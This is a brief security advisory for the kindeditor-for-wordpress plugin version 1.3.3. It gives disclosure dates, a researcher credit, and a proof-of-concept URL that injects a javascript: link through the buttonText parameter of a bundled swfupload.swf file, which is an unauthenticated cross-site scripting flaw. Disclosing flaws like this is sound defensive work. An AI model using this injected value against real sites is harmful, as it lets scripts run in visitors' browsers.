wp-plugin : kindeditor-for-wordpress

Plugin Details
Plugin Name: wp-plugin : kindeditor-for-wordpress
Effected Version : 1.3.3 (and most probably lower version's if any)
Vulnerability :
Identified by : prajalkulkarni
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :

http://localhost/wordpress/wp-content/plugins/kindeditorforwordpress/plugins/multiimage/images/swfupload.swf?buttonText=%3Ca%20href=%22javascript:alert(1)%22%3EClick+For+XSS%20%3Cfont%20size=%2216%22%3E%3C/a%3E


Disclosure Timeline
Vendor Contacted : 2013-12-09
Plugin Status : Updated on 2014-01-11
Public Disclosure : May 25, 2014
CVE Number :
Plugin Description :
[| Because most users of this plug-in are Chinese people,following I use Chinese. kindeditor是一个简单高效,易于使用的编辑器,内置了google code prettify,可以简单快速的插入代码。 ]